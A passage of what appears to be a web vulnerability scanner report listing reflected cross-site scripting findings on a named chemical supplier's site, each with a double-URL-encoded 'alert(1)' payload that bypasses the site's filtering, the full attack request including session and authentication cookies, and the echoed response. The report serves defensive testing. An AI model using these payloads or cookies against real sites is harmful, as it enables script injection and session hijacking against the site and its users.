The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5867%2522%253balert%25281%2529%252f%252f9ad24bd13ca was submitted in the REST URL parameter 2. This input was echoed as d5867";alert(1)//9ad24bd13ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibd5867%2522%253balert%25281%2529%252f%252f9ad24bd13ca/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:01 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibd5867";alert(1)//9ad24bd13ca/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf","E404") ;
   </script>
...[SNIP]...

1.299. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9cd3%2522%253balert%25281%2529%252f%252fcbb5d0d0ac was submitted in the REST URL parameter 3. This input was echoed as a9cd3";alert(1)//cbb5d0d0ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docsa9cd3%2522%253balert%25281%2529%252f%252fcbb5d0d0ac/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:06 GMT
Content-Length: 28998
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docsa9cd3";alert(1)//cbb5d0d0ac/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf","E404") ;
   </script>
...[SNIP]...

1.300. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7791%2522%253balert%25281%2529%252f%252f647a95d10b7 was submitted in the REST URL parameter 4. This input was echoed as a7791";alert(1)//647a95d10b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigmaa7791%2522%253balert%25281%2529%252f%252f647a95d10b7/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:11 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigmaa7791";alert(1)//647a95d10b7/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf","E404") ;
   </script>
...[SNIP]...

1.301. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94f63%2522%253balert%25281%2529%252f%252faa7b8fef9ea was submitted in the REST URL parameter 5. This input was echoed as 94f63";alert(1)//aa7b8fef9ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information94f63%2522%253balert%25281%2529%252f%252faa7b8fef9ea/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:16 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information94f63";alert(1)//aa7b8fef9ea/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf","E404") ;
   </script>
...[SNIP]...

1.302. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/asms2006prot20.Par.0001.File.tmp/asms2006prot20.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95130%2522%253balert%25281%2529%252f%252fcc7e9faffd3 was submitted in the REST URL parameter 6. This input was echoed as 95130";alert(1)//cc7e9faffd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information/95130%2522%253balert%25281%2529%252f%252fcc7e9faffd3/asms2006prot20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:21 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Information/95130";alert(1)//cc7e9faffd3/asms2006prot20.pdf","E404") ;
   </script>
...[SNIP]...

1.303. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/cresswellccex.Par.0001.File.tmp/cresswellccex.pdf

